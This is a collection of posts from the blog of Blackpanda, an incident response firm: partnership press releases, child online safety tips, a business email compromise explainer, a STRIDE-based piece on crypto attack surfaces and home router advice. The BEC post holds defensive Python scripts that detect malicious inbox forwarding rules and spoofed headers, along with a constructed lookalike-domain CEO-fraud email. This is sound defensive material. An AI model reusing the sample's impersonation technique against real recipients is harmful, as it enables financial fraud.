Blackpanda Blog

A collection of resources for you to skill up and stay informed.

Browse our resources for the latest cyber news, cyber security best practice, and company updates. Already know what you’re looking for? Simply filter by topic, content type, and skill level.

News

SB C&S and Blackpanda Sign Distribution Agreement for Incident Response services for SMBs

SB C&S Corp. (Head office: Minato-ku, Tokyo; President and CEO: Yasuo Mizoguchi; hereinafter "SB C&S") has concluded a distribution agreement with BLACKPANDA JAPAN K.K. (Head office: Chiyoda-ku, Tokyo; Representative Director: David Yu Suzuki; hereinafter "Blackpanda") in Japan and will commence the distribution of Blackpanda’s “IR-1” incident response service from March 14, 2024.

Blackpanda's IR-1 is an incident response service designed for small and medium-sized businesses. In the event of a cyber incident such as a ransomware infection or business email compromise, Blackpanda helps the client return to normal operations as soon as possible by isolating the affected systems and investigating the root cause. Incident response services are generally expensive to implement, but IR-1 is designed to be accessible to small and medium-sized businesses, being offered in a subscription format starting from one incident response credit at ¥350,000* per year.

(*For companies with fewer than 250 endpoints; prices exclude tax; as of March 2024)

Under the agreement, SB C&S will promote Blackpanda's service offerings through its nationwide sales network of approximately 13,000 partner companies. 

Product Details 

https://www.it-ex.com/products/maker/blackpanda/ir1-byblackpanda.html 

Inquiries about our products 

SBCASGRP-security-marketing@g.softbank.co.jp 

Endorsement from Mr. David Yu Suzuki, Representative Director, BLACKPANDA JAPAN K.K. 

“Blackpanda Japan looks forward to further deepening its cooperation with SB C&S. We aim to provide innovative cyber security solutions in the Japanese market with localized, complete support. 

Customers today require more advanced cyber security measures and incident response services, but many Japanese companies face challenges posed by a lack of relevant resources and expertise. The cooperation between Blackpanda and SB C&S will enable the creation of a stronger cybersecurity ecosystem in Japan. We are committed to promoting this on a national scale.” 

Endorsement from Mr. Yasuo Mizoguchi, President and CEO, SB C&S Corp. 

“While digitization in all fields is progressing rapidly, the number of cyber attacks is increasing day by day. Not only large enterprises but also small and mid-sized companies need to take more security measures, including against attacks targeting their supply chains. Blackpanda's "IR-1" solution, which aims to "democratise cyber resilience," is a packaged service optimized for small and medium-sized enterprises, from proactive prevention using ASM scanning to post-incident response. We will continue to work with Blackpanda to provide our customers with robust secure cyber security solutions through our nationwide sales partners.” 

About BLACKPANDA GROUP 

Blackpanda is Asia's leading local cyber incident response firm, dedicated to delivering world-class digital emergency response services to businesses in the region. We help businesses strengthen their cyber resilience and secure their digital operations by supporting them with incident response delivered by local experts. 

Our mission is to make cyber resilience achievable for all, with services and solutions designed for the Asian market. 

https://www.blackpanda.com 

About SB C&S Corporation 

SB C&S inherited the IT distribution business of Softbank Group, the group’s original business. SB C&S strives to rapidly identify changes in the market environment and create new business models. For corporate customers, SB C&S provides product solutions utilizing advanced technologies including cloud computing and AI through the largest sales network in Japan. For consumers, we are leveraging our unique planning and development capabilities to expand our product lineup from software and mobile accessories to IoT products and services. For more information, please visit our website at https://cas.softbank.jp/ 

SoftBank and the SOFTBANK name and logo are registered trademarks or trademarks of SOFTBANK Group Corp. in Japan and other countries. 

All other company names and product/service names mentioned in this notice are registered trademarks or trademarks of their respective companies. 

For inquiries regarding this matter, please contact 

SB C&S Public Relations and PR Office (c/o Antil, Inc.) 

Tel: 03-5572-6081 E-mail: sbcas@vectorinc.co.jp 

Blackpanda Marketing Communications 

Tel: +65 9755 9312 E-mail: may@blackpanda.com 

News

Unveiling Blackpanda’s Revamped Brand

The Blackpanda brand has undergone a revamp to bring it in-line with our stated mission to democratise cyber resilience. Tech-driven and hyper-focused on cyber incident response, our refreshed brand represents Blackpanda better than ever before.

The Blackpanda team is thrilled to unveil our refreshed brand. Months of research, workshops, and creative effort have led to a refined brand that represents our company and the work we do better than ever before. 

With a newly defined commitment to the cyber resilience of Asian businesses (see “Our Vision”), Blackpanda clearly stakes out its position in a crowded market. Blackpanda stands for local, specialised and technology-driven incident response, dedicated to delivering world-class emergency response services to businesses in the Asian region.

Our visual brand, too, has undergone a refinement process. Granted, anyone outside of Blackpanda may not notice much difference, but small changes to imagery can be powerful nonetheless. Where our old logo included a reference to founding members’ proud history in the armed forces, our new logo turns the focus on our digital specialisation and Blackpanda’s unique ability to leverage in-house data to constantly develop better products.

With a renewed focus on our mission to make cyber resilience achievable for all, we have also redesigned our website for clearer information and easier use. Our flagship product IR-1 by Blackpanda takes pride of place, and we have made it easier for existing and potential partners to find relevant information. We hope you enjoy the new website!

Want to talk to our team about our products and services? Contact us today using our easy online forms. 

News

Empowering SMEs: Blackpanda and Bare Cove Technology Forge Strategic Alliance

Blackpanda and Bare Cove Technology join forces to offer a comprehensive and dynamic cyber security strategy tailored specifically for SMEs.

Hong Kong, 19 October 2023 - In a strategic alliance set to redefine cyber resilience for SMEs across Asia, Blackpanda and Bare Cove Technology join forces to address digital threats as a cohesive whole. This collaboration fuses Blackpanda’s capability in incident response and digital forensics with Bare Cove’s advanced cyber consultancy and managed services to offer a comprehensive and dynamic cyber security strategy tailored specifically for SMEs. 

In a recent poll conducted by Blackpanda, 66% of businesses responded that, when facing a cyber breach, they would turn to their managed services providers (MSPs) for assistance. This finding underscores the pivotal role managed service providers play in bolstering cyber security and their position as a trusted first point of contact during a cyber crisis.

Gene Yu, Founder and CEO, Blackpanda, said, “The collaboration between Blackpanda and Bare Cove is timely, as this not only resonates with our core mission to democratise cyber resilience but also marks a major milestone in the marketplace. We are here to empower managed service providers to elevate their business proposition with robust incident response capabilities. This is a synergistic approach to fortify the first line of defence with the vital tools needed to build an integrated cyber resilience solution against digital threats. We believe it’s game changing for MSPs.”

Emily Randall, Founder and CEO, Bare Cove Technology, added, “At Bare Cove Technology, we are committed to delivering comprehensive solutions that cater to the specific needs of Asia-based financial firms. By teaming up with Blackpanda, we are taking our expertise to the next level by leveraging our combined strengths to offer a more comprehensive range of services, from cutting-edge cyber security testing to incident response readiness. This collaboration not only strengthens our individual accomplishments but also allows us to address the evolving cyber security challenges that are deeply needed by businesses in the Asia Pacific region.”

This strategic alliance brings together an unparalleled team of cyber security specialists in cloud technologies, IT infrastructure, automation, penetration testing, digital forensics, and incident response. Together, Blackpanda and Bare Cove Technology harness the most recent innovations in cyber security to enhance capabilities and align with global regulatory demands to help SMEs navigate today’s digital landscape more securely. 


About Blackpanda

Blackpanda is Asia's premier local cyber incident response firm, dedicated to delivering world-class digital emergency response services to businesses in the region.  Blackpanda exists to defend organisations across APAC. We help businesses strengthen their cyber resilience and secure their digital operations by supporting them with incident response delivered by local experts. Our mission is to make cyber resilience achievable for all, with services and solutions designed for the Asian market. For more information, please visit www.blackpanda.com

About Bare Cove Technology 

Bare Cove Technology (BCT) is an award-winning IT and cybersecurity solutions provider. Our team is made up of proven leaders in the fields of cyber security, software development, cloud technologies, and IT infrastructure and design. Based in Hong Kong, Singapore, and Australia, BCT supports the top asset managers in the Asia Pacific region, helping our clients meet the evolving expectations of institutional investors and global regulators. For more information, please visit www.barecovetech.com.

News

Binalyze Secures Exciting New Partnership with Singapore's Blackpanda

SINGAPORE, October 12, 2023 – In an important strategic move that promises to expand digital forensic and incident response (DFIR) investigation capabilities in the Asia Pacific region, Binalyze has successfully secured a deal with Blackpanda, a renowned incident response firm based in Singapore.

This milestone collaboration started almost one year ago. Following ten months of thorough evaluation, in which it considered many different DFIR technologies on the market, Blackpanda chose to work with Binalyze.

This partnership will be formally announced at the upcoming GovWare 2023 event, 17-19 October, where Binalyze, in association with its regional distributor Athena Dynamics, is showcasing the innovative capabilities of its Binalyze AIR platform.

Emre Tinaztepe, CEO and Founder of Binalyze, and Gene Yu, Founder & CEO of Blackpanda, will both be in attendance, and GovWare will mark the formalizing of this new synergistic partnership. Binalyze AIR was chosen for its clear technological superiority.

Emre Tinaztepe, speaking on the occasion, shared, “At Binalyze, we envision a future where technology seamlessly integrates with human expertise to advance digital forensics. 

AIR has been designed to speed up key processes associated with DFIR, such as evidence collection and presenting this information back with key recommendations and observations. With Blackpanda, we've found a partner who shares our vision and recognizes the transformative potential of our AIR platform.”

Binalyze's AIR platform stands out in a marketplace of traditional incident response forensic solutions. It was built from the ground up to be intuitive to use, capturing evidence at speed and significantly reducing analyst overhead thanks to its automation features. Its introduction to Blackpanda's suite of services comes at a time when rapid, accurate, and streamlined response mechanisms are of utmost priority in cyber security.

Gene Yu said, “Leveraging innovation, partnering with Binalyze has been a game-changer to stay at the forefront of cyber resilience. At Blackpanda, we're committed to empowering businesses with attack surface risk management scans alongside rapid emergency response services during cyber attacks. In the critical battle to contain cyber breaches, precision and speed are paramount to democratize our digital emergency response capabilities - ensuring we act swiftly and effectively to help as many victims as possible.”  

This partnership is a testament to the continuous evolution and dedication both companies hold toward fortifying digital estates. As cyber threats grow in complexity, collaborations such as these pave the way for a safer, more resilient digital ecosystem.

About Binalyze

Binalyze is the creator of the world’s fastest and most comprehensive DFIR solution, AIR.

AIR remotely, securely, and automatically collects over 350 digital forensic artifacts in under 10 minutes.

With evidence collected, its Timeline, Triage, interACT, and DRONE product features help organizations analyze, investigate, collaborate, and complete incident response investigations quickly to dramatically reduce dwell time.

Binalyze’s AIR saves time, reduces cyber security operational costs in both MSSPs and large enterprises’ SOCs, and helps prevent financial and reputational losses associated with cyber attacks.

In September 2023, Binalyze announced it had raised $19M through its Series A investment round. This was led by Molten Ventures with participation from existing investors, Earlybird Digital East and OpenOcean, and new strategic investors Cisco Investments, Citi Ventures, and Deutsche Bank Corporate Venture Capital. 

For more information, please visit https://www.binalyze.com.

About Blackpanda

Blackpanda is Asia's premier local cyber incident response firm, dedicated to delivering world-class digital emergency response services to businesses in the region.

Blackpanda exists to defend organizations across APAC. We help businesses strengthen their cyber resilience and secure their digital operations by supporting them with incident response delivered by local experts.

Our mission is to make cyber resilience achievable for all, with services and solutions designed for the Asian market. 

For more information, please visit https://www.blackpanda.com

The Basics

Four tips to keep kids safe online

Gone are the days when kids received their first phone in middle school—today, children of elementary school age are already tied to their smartphones. It is paramount to establish open and honest channels of communication with your children about safety, privacy, and the Internet. 

Deemed as a “cyber pandemic”, the Child Online Safety Index (COSI) of Singapore highlights that 60% of children aged 8–12 who are active online users are exposed to cyber risk. Moreover, 45% of children within the same age range are affected by cyberbullying (proven to have long-standing mental health implications among youth). 

While the cyber world and the threats that loom within it might seem daunting, it need not be. Here are some tips to help keep your kids safe online.

1. Teach Kids About Secure Passwords

Using your dog's name, best friend's name, favorite sports team, or birthday as your password is not the way to go, a common mistake made not only by kids but also by many adults! As a refresher, a good password is long (at least 10 characters, and longer is better; a passphrase of several unrelated words is easy to remember), is unique to each account, and mixes capital and lowercase letters, numbers, and symbols. Length matters far more than any single symbol!

Attackers have gotten very good at cracking passwords. Automated tools can break simple passwords in hours, or in minutes when they are fed known facts about the victim such as birthdays, pet names, or anniversaries. Kids may have a higher tendency to overshare online as they may not yet have a solid understanding of privacy, which makes them easier targets for these kinds of password-cracking tactics.

Another common mistake made by children is sharing passwords with their friends, or logging into their social media accounts on a friend's device and forgetting to log out. Explain to your children the effects of sharing login credentials: if your friend gets hacked, you may be compromised too. Lastly, you can check whether your children's credentials (or yours) have already appeared in a known breach using services like Have I Been Pwned (haveibeenpwned.com).

2. Understand the Risks of Torrenting and Illegal Streaming

While torrenting a movie may seem like a free alternative, the low price tag comes with many hidden costs, including malware bundled with the download or a ransomware payment to restore encrypted files. Illegal streaming sites also often use 'malvertising' (malicious advertising): pop-up windows disguised as ordinary advertisements that deliver malware. As most of these services are illegal, you and your children should not trust any downloads from, or interactions with, such sites.

Talk to your kids about the risk of these services and, if necessary, implement appropriate parental controls on your children’s browser for added security. Use Internet content filters to block accessing or downloading unwanted web content such as offensive, malicious, or scamming content.

3. Educate Your Children on the Value of Privacy and Boundaries

Kids these days tend to overshare on social media. It is crucial that children understand the meaning and importance of privacy and boundaries. 

“Stranger danger” is real and more prevalent than ever on social media with the rise of social engineering. Put simply, social engineering is a non-technical strategy used by cyber attackers that leverages human interaction and relationships to gain unauthorized access to accounts, files, and systems. 

The same way your children should not talk to or give personal information to a stranger on the street, this habit should extend into the cyber realm. As a parent, you can protect your child by starting discussions on privacy and online interactions early, even before the day they are given access to a smart device.

You can help your children set boundaries by agreeing rules on using electronic devices, such as when, where and why they may be used. Use technology such as parental control applications to better enforce these agreements.

4. Be Aware of and Teach Kids How to Identify Signs of Cyberbullying 

Lastly, a child's online security extends to their mental health when interacting online. Cyberbullying comes in many shapes and forms, including disclosing someone's personal or private information online without their consent, harmful comments or messages, impersonation, and exclusion from online groups. The effects of cyberbullying can manifest themselves in many ways, including loss of appetite, social isolation, and self-harm.

As adults, you must be able to identify these signs. Children often do not know when to speak up or feel ashamed, but it is important that they know that help is always there, should they need it. Below are some local resources that may help you if you suspect signs of cyberbullying.

Looking For Help in Singapore?
  • The Cyber Security Agency of Singapore has a website dedicated to cyber safety called “Gosafeonline”. The website is supplemented with Facebook, and Twitter pages where you can find practical bite-size tips and downloadable resources to educate yourself on online safety. A dedicated section for parents to learn more about protecting their children online also exists within the site.

  • Cyberbullying is a criminal offense under the Protection from Harassment Act (POHA) of Singapore; report cyberbullying to the police. Cyberstalking and online harassment are likewise criminal offenses under the POHA.

  • The Ministry of Education (MOE) has a Cyber Wellness education program that delivers cyber wellness education through the curriculum, workshops, talks, and activities in local schools. Resources from the MOE on Safeguarding your Child Online and the Guide for Parents on Setting Parental Controls are easily accessible.

Reference:

  • 2020 Child Online Safety Index & Country Level Reports by the DQ Institute, https://www.dqinstitute.org/child-online-safety-index/

The Basics

What Is a business email compromise?

Learn about preventing, identifying, and resolving a BEC before it can cause significant harm to your business.

A Business Email Compromise (BEC) is a type of cyber attack that uses email fraud to achieve a specific outcome that harms the victim, usually financial fraud. BEC may be conducted by gaining direct, unauthorized access to an individual's email account, or by impersonating an account from outside, either by forging the sender address or by registering a lookalike domain (both commonly called 'spoofing').

BEC is one of the most financially damaging cyber crimes. In the United States alone, US$1.77 billion in losses were reported in 2019 according to the FBI's Internet Crime Complaint Center (IC3). In Asia, financial hubs such as Singapore and Hong Kong are among the most targeted markets for BEC attacks.

How does a typical BEC work?

A typical BEC scam involves phishing emails purportedly sent by senior employees in an attempt to trick the recipient into making fund transfers or divulging sensitive information. As such, attackers often target employees with key decision-making powers, especially those with the ability to authorize financial transactions such as CEOs and members of finance, accounting, or vendor management.

In some cases, attackers may silently monitor sensitive communications for months (or years!), auto-forwarding email conversations to their own inboxes. Attackers may closely study these conversations in order to map out reporting lines, communications procedures, standard documentation, and even the typical language used by their targets. The resulting phishing emails are often well-crafted, well-timed, and virtually indistinguishable from a legitimate request, including familiar letterheads, banking, and invoice instructions.

BEC scammers also commonly ‘spoof’ government organizations such as law enforcement, tax agencies, or healthcare entities to create a sense of authority, urgency, or fear to convince victims to act quickly.

Common tactics, techniques & procedures (TTPs) used by BEC scammers

  • Gaining unauthorized access to a mailbox, typically by phishing for credentials
  • Collecting intelligence, for example through forwarding rules that silently copy conversations to the attacker
  • Attempting to defraud the organization or its clients with fraudulent payment or invoice requests
  • Stealing information from the compromised mailbox

How to prevent BEC scams

  • Enable multi-factor authentication (MFA) on all user accounts. MFA requires every login to present a second factor in addition to the password, which blocks the majority of attempts that rely on a stolen or guessed password alone
  • Enforce strong, unique passwords. Length and uniqueness matter more than complexity rules: a long password is hard to brute-force, and one that is not reused elsewhere cannot be replayed from another breach. A phished password is still a phished password, which is why MFA is the more important control
  • Minimize the number of employees with 'Admin' access to email configurations. Following the principle of least privilege reduces the number of privileged accounts an attacker can target
  • Reset email account passwords immediately when suspicious activity is identified, and revoke the account's active sessions and tokens at the same time. A password change alone does not always terminate sessions that are already signed in
  • Review mailbox delegates regularly and remove any who do not need access. Depending on the setup a delegate may hold read, send, delete or full access, so if a delegate's account is compromised your mailbox can be used in a BEC attack
  • Disable or block mail forwarding rules to external domains, and alert on newly created inbox rules. This prevents BEC scammers from silently collecting email communications and from hiding the replies to their fraudulent messages
  • Enable mailbox auditing and retain the audit logs for review. These logs allow the organization to monitor access, track potential security breaches and spot signs of internal misuse of information
  • Continuously educate employees on cyber security awareness and good cyber hygiene practices
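
The forwarding-rule and delegate controls above are easiest to enforce when you can audit rules in bulk rather than mailbox by mailbox. The script below is an added example, not Blackpanda's tooling: it reads a JSON export of one user's inbox rules and flags the patterns BEC actors rely on, namely forwarding or redirecting to an external domain, rules that move or delete messages whose subjects mention payments or security, and rules with blank or punctuation-only names. The field names are modelled on the properties of Exchange Online's Get-InboxRule output, the list of internal domains is an assumption, and the export itself is a constructed sample.

```python
"""Audit a mailbox inbox-rule export for BEC persistence patterns.

Added example, not Blackpanda's own tooling. Field names are modelled on the
properties Exchange Online's Get-InboxRule cmdlet returns; the sample export
below is constructed for illustration.
"""
import json

# Assumption: these are the organisation's own domains; anything else is external.
INTERNAL_DOMAINS = {"example.com", "corp.example.com"}

# Subjects attackers commonly hide from the mailbox owner so the fraud goes unnoticed.
SUSPICIOUS_KEYWORDS = {"invoice", "payment", "wire", "bank", "password", "security alert"}

# Constructed sample: what an export of a compromised user's rules might look like.
SAMPLE_EXPORT = json.dumps([
    {"Name": "Sort newsletters", "Enabled": True, "ForwardTo": [],
     "ForwardAsAttachmentTo": [], "RedirectTo": [], "MoveToFolder": "Newsletters",
     "DeleteMessage": False, "SubjectContainsWords": ["newsletter"], "MarkAsRead": False},
    {"Name": ".", "Enabled": True, "ForwardTo": ["finance-backup@example-mail.co"],
     "ForwardAsAttachmentTo": [], "RedirectTo": [], "MoveToFolder": None,
     "DeleteMessage": False, "SubjectContainsWords": [], "MarkAsRead": False},
    {"Name": "Archive", "Enabled": True, "ForwardTo": [],
     "ForwardAsAttachmentTo": [], "RedirectTo": [], "MoveToFolder": "RSS Feeds",
     "DeleteMessage": False, "SubjectContainsWords": ["invoice", "payment"], "MarkAsRead": True},
])


def domain_of(address: str) -> str:
    """Return the lower-cased domain of an SMTP address; a display name is tolerated."""
    addr = address
    if "<" in address and ">" in address:
        addr = address[address.rfind("<") + 1 : address.rfind(">")]
    return addr.strip().rsplit("@", 1)[-1].lower()


def audit_rules(export_json: str, internal_domains=INTERNAL_DOMAINS) -> list:
    """Return (rule name, finding) pairs for enabled rules matching BEC persistence patterns."""
    findings = []
    for rule in json.loads(export_json):
        if not rule.get("Enabled", True):
            continue
        name = rule.get("Name") or "<unnamed>"

        # 1. Any forward/redirect target outside the organisation's domains.
        targets = (
            (rule.get("ForwardTo") or [])
            + (rule.get("ForwardAsAttachmentTo") or [])
            + (rule.get("RedirectTo") or [])
        )
        external = [t for t in targets if domain_of(t) not in internal_domains]
        if external:
            findings.append((name, "forwards mail to external address(es): " + ", ".join(external)))

        # 2. Rules that bury or delete financial / security mail so the owner never sees it.
        keywords = {w.lower() for w in rule.get("SubjectContainsWords") or []}
        hidden_hits = keywords & SUSPICIOUS_KEYWORDS
        hides = bool(rule.get("DeleteMessage")) or rule.get("MoveToFolder") not in (None, "", "Inbox")
        if hides and hidden_hits:
            findings.append((name, "hides messages matching: " + ", ".join(sorted(hidden_hits))))

        # 3. Attacker-created rules are often named with a single dot or left blank.
        if not name.strip(". "):
            findings.append((name, "rule name is blank or punctuation only, a common trait of attacker-created rules"))
    return findings


if __name__ == "__main__":
    for rule_name, finding in audit_rules(SAMPLE_EXPORT):
        print(f"[!] rule {rule_name!r}: {finding}")
```

Point it at a real export (for Exchange Online, Get-InboxRule piped through ConvertTo-Json exposes these properties; adjust the parsing if your export formats addresses differently) and review every finding by hand: a forward to a personal address can be legitimate, but on a finance user's mailbox it is the first thing to remove and the first thing to look up in the audit log to see who created it.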

What to do if you suspect a BEC scam

  1. Do not interact with the suspicious email:
     • Do not click any links or embedded objects in the email
     • Do not open or download any attachments
  2. Contact the sender or sender organization via phone or another out-of-band channel (such as WhatsApp) to verify the legitimacy of the email. Do not use contact details taken from the suspicious email itself
  3. If the message is not legitimate, report it to your IT Security team* immediately and forward the suspicious email as an attachment, so that the original headers are preserved and the team can analyze it properly
  4. Consult the IT Security team if you are not sure how to forward the original email as an attachment
  5. Inform the team if you have interacted with the email or sender in any way
  6. Reset passwords on any compromised accounts immediately and revoke their active sessions
  7. Analyze the email to identify any malicious content and its associated behavior
  8. Analyze relevant logs to identify any indicators of compromise and perform exposure checks
  9. Block the malicious domains and sender addresses identified, and add them to monitoring
  10. Document and communicate broadly any lessons learned from the incident to improve company policies and controls
  11. Conduct relevant employee awareness training to prevent similar attacks in the future

*If there are no internal IT Security team or other teams with the incident response expertise to handle such attacks, please consult a third-party incident response firm such as Blackpanda to assist you in resolving the issue.
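
The "analyze the email" step above begins with the headers, which survive forwarding only when the message is sent as an attachment. The function below is an added example, not Blackpanda's own procedure: using only the Python standard library, it parses a raw message and reports the header-level indicators a responder checks first, a Reply-To on a different domain from the From address, a From domain that is a lookalike of a trusted domain, an executive's display name on an external address, a Return-Path that does not match, and failing SPF, DKIM or DMARC results. The trusted domain, the executive's name and the sample message are all constructed for the demo.

```python
"""Header-level triage of a suspected BEC email.

Added example, not Blackpanda's procedure. Standard library only; the trusted
domain, executive name and sample message are constructed for the demo.
"""
import re
from difflib import SequenceMatcher
from email import message_from_string
from email.utils import parseaddr

# Assumptions: the organisation's real domain(s) and the people most often impersonated.
TRUSTED_DOMAINS = {"example.com"}
HIGH_VALUE_NAMES = {"jane doe"}  # the CEO in this constructed scenario

# Constructed sample: lookalike-domain CEO fraud with a mismatched Reply-To.
SAMPLE_EMAIL = """\
Return-Path: <bounce@examp1e.com>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=examp1e.com; dkim=none; dmarc=fail header.from=examp1e.com
From: Jane Doe <jane.doe@examp1e.com>
Reply-To: Jane Doe <jd.ceo.office@gmail.com>
To: accounts@example.com
Subject: Urgent wire transfer - confidential
Date: Mon, 04 Mar 2024 08:12:00 +0800

Hi, I need you to process an urgent vendor payment today. Confirm and I will send the details.
"""


def lookalike_of(domain: str, trusted=TRUSTED_DOMAINS, threshold: float = 0.8):
    """Return the trusted domain that `domain` imitates, or None.

    An exact match is not a lookalike; a one-character swap such as examp1e.com
    scores well above the threshold with SequenceMatcher, unrelated domains do not.
    """
    for good in trusted:
        if domain == good:
            return None
        if SequenceMatcher(None, domain, good).ratio() >= threshold:
            return good
    return None


def triage(raw: str) -> dict:
    """Parse a raw RFC 5322 message and list the header indicators a responder checks first."""
    msg = message_from_string(raw)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    _, return_path = parseaddr(msg.get("Return-Path", ""))
    auth = msg.get("Authentication-Results", "")

    from_domain = from_addr.rsplit("@", 1)[-1].lower()
    reply_domain = reply_addr.rsplit("@", 1)[-1].lower() if reply_addr else from_domain
    indicators = []

    # Replies routed to an address the attacker controls.
    if reply_domain != from_domain:
        indicators.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    # Typosquatted / lookalike sender domain.
    imitated = lookalike_of(from_domain)
    if imitated:
        indicators.append(f"From domain {from_domain} is a lookalike of trusted domain {imitated}")
    # Executive display name on an address outside the organisation.
    if from_name.strip().lower() in HIGH_VALUE_NAMES and from_domain not in TRUSTED_DOMAINS:
        indicators.append(f"display name '{from_name}' impersonates an executive from an external domain")
    # Sender authentication results as recorded by the receiving MX.
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1).lower() in ("fail", "softfail", "permerror", "none"):
            indicators.append(f"{mech} result is {m.group(1)}")
    # Envelope sender that does not match the visible From.
    if return_path and return_path.rsplit("@", 1)[-1].lower() != from_domain:
        indicators.append("Return-Path domain differs from From domain")

    return {
        "from": from_addr, "reply_to": reply_addr, "return_path": return_path,
        "indicators": indicators,
        "verdict": "suspicious" if indicators else "no header indicators",
    }


if __name__ == "__main__":
    result = triage(SAMPLE_EMAIL)
    print(result["verdict"])
    for line in result["indicators"]:
        print(" -", line)
```

Header indicators are a triage signal, not a verdict: a hijacked internal mailbox passes SPF, DKIM and DMARC cleanly and uses the real domain, which is exactly why the out-of-band verification step comes before any technical analysis.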

Protect & Defend

Can crypto be hacked?

With attacks on crypto companies–including the Crypto[.]com hack and the Coinbase vulnerability–headlining news outlets this month, consumer confidence is being shaken, and a host of questions are being raised about the cyber security of cryptocurrencies. At Blackpanda, we investigate cyber crimes committed across all technology verticals, including crypto.

As a rule of thumb in cyber security, if something has a connection to the internet, it can be hacked. The crypto industry is no different. This article will provide insight as to why the answer to the question “can crypto be hacked” is yes, and why everyone involved in the crypto space should be prepared to deal with a cyber incident. 

Is my crypto investment safe?

In the world of technology, there is always some probability of a cyber incident taking place. Whether it is hacking, denial of service, insider threat, account compromise, or technical failure, all technology can be broken in some way, no matter how implausible it may seem. 

The likelihood of an event is what usually has a defining impact on how we approach securing different technologies. In fact, the probability of someone manipulating every endpoint contributing to or reading from a blockchain is very low. However, if attackers succeed at compromising even a fraction of a widely used wallet or platform, this can bring them significant financial gains. 

As the number of crypto technologies increases—and the total number of users increases with them—the number of attackers that turn their efforts to stealing a part of that goes up as well. That is the likelihood of a crypto hack.

But wait—isn't crypto hard to hack?

Attackers typically target companies that are low-effort, high-reward to hack. Remote access is a great example of this. Attackers constantly scan the Internet, sending billions of packets, or “probes”, looking for an open, vulnerable remote service port that would give them direct access into a company. This is much like knocking on every door in search of a target, hoping that someone left theirs unlocked.

Usually, threat actors will give up if a target seems too challenging to attack, or attacking them requires too much effort. Persistent threat actors, however, continually chip away at high-value targets until something gives, breaks, or introduces an opportunity for exploitation. 

Crypto platforms are no different in that they run on several of the elements we see exploited. Stolen API keys, unprotected databases exposed to the internet, social engineering and phishing; each of these can be targeted, as they form a component in the overarching infrastructure that makes crypto work.

How do you hack crypto?

There are many ways to apply force to an attack surface; in military terminology the aim is to deny, degrade, disrupt, destroy, or deceive the target. The STRIDE model lists six categories of threat and works well for developers and security teams to collaborate and answer, “What can be attacked and how?”

STRIDE stands for:

  • Spoofing—Whereby a user or program pretends to be another
  • Tampering—Whereby attackers modify data, components or code
  • Repudiation—Whereby an actor can deny having performed an action because events are not logged or monitored, or the records can be altered
  • Information disclosure—Whereby data is leaked or exposed to someone not authorized to see it
  • Denial of Service (DoS)—Whereby services or components are overloaded or otherwise made unavailable to disrupt normal use
  • Elevation of privilege—Whereby attackers grant themselves additional permissions, even admin, to gain greater control over a system

What can be hacked?

If we quickly apply this methodology to crypto, we can identify several components that make up the attack surface and that can be targeted by the patterns in STRIDE.

Application back end

The back end of an application includes all the servers, developer systems, source code and repositories, third-party libraries or plug-ins, and the other parts that make up the blockchain technology. Just this week a bug was detected in the Coinbase application that allowed users to steal unlimited cryptocurrency. This shows that the APIs in use can have zero-day vulnerabilities that attackers exploit to their advantage.

The most damaging to a company, however, is when the source code itself is compromised. A malicious code release would manipulate the underlying functionality of the app to siphon or outright steal tokens and transfer them to an attacker's wallet.

End user application 

End users manage their access and authentication tokens, interact with the application through their browser, and often download an exchange’s app to their phone. An attacker can target either the mobile or the web-based application.

A threat actor may try to perform a man-in-the-middle attack. Think of a malicious browser extension that can steal all the wallet information as a user creates it. Out-of-date browsers and suspicious browser extensions make this attack more likely. By attacking out-of-date browsers, criminals can gain access to the information a user normally enters during account creation. Thus, sensitive data such as personal details and copies of private keys could be rendered vulnerable and accessible to cyber threat actors.

Sensitive information could also be intercepted during an internet session if the user is on an insecure network, such as public Wi-Fi.

Network

The network spans user and company access to the platform, the content distribution network, and connectivity to the distributed servers performing proof of work or maintaining the ledger (depending on the type of platform). Though outages occur all the time, a prolonged outage between endpoints in the network would degrade the service and could stop the normal function of the blockchain. 

Website

The website includes all public-facing pages, the web servers, and the plug-ins that allow people to learn more or sign up for services. Defacement of any website could damage the company’s reputation. A website takedown by denial of service would cause a business interruption and result in monetary losses.


Though it seems like an easy question, I am answering it in this way because technology changes constantly, no surprise there. The cryptocurrency architecture of today may be entirely re-invented in a year’s time. It is important to have a repeatable process, not one-off procedures, to get an idea of how a hack could happen today. Look at any hacking problem as an attack surface, a threat, and the likelihood and probability that the attack will succeed.

Though the likelihood of any of the attacks you identified in your threat model may stay the same or decrease with compensating controls, the probability increases every day as the number of attempts increases. Anything can be hacked; it is a matter of time and resources. Stay tuned for our next article, where I dissect these attacks in more detail.

Prepare

The new normal: Securing your work-from-home environment

Read more about some simple but effective tips for helping you and your workforce protect your digital assets while working outside the security of your office.

Your office is a fortress. You protect it with firewalls, anti-virus, backup power supplies, corporate policies, and a team of dedicated IT security professionals. These same layers of security and personnel in place at work are (most likely) not present in your home. 

With more companies issuing indefinite work-from-home orders, we seem to have entered a new normal. Although working from home has its benefits, it also increases your exposure to a cyber attack. The threat landscape now extends to your home network. 

The following are some simple but effective tips for helping you and your workforce protect your digital assets while working outside the security of your office. 

Securing Your Network Connection

Your home router is the gateway to the outside world for all of your connected devices—laptops, mobile phones, smart TVs, AI assistants, etc.  Everything you own that is connected to the Internet is a potential point of entry for attackers. Are you aware of how many devices are connected to your network right now? Is your router secure? What’s the worst that could happen if it isn’t?

For starters, unauthorised users can disable your router’s security and begin stealing personal information without you knowing. Botnet attacks can hijack an unsecured router to saturate your bandwidth and launch subsequent attacks. “Signal surfers” can log in from just down the hallway using your easy-to-guess password, creating their own network using YOUR router.

But the risks go far beyond piggy-backing neighbours slowing down your connection speeds. Unauthorised users can also use your unsecured router to mask their own identity, committing serious crimes in YOUR name (or at least attributable to your gateway’s IP address).

When was the last time you updated your router? Have you never changed the default “Admin/Password” combination that controls your whole Wi-Fi router? Updating your home router is simple – it takes just a few minutes and can protect your home network from a number of critical vulnerabilities.

Secure your home router by following these simple steps:

  1. Look up your router model online to determine your router’s central login address (e.g., “192.168.1.1” or “routerlogin.net”)
  2. Enter your router’s login address into your web browser
  3. Log in with the default username and password (usually both ‘admin’ or ‘admin/password’ - also searchable on the internet)
  4. Go to settings and select ‘Change Router Password’ (or similar)
  5. Enter your new password
  6. Save settings

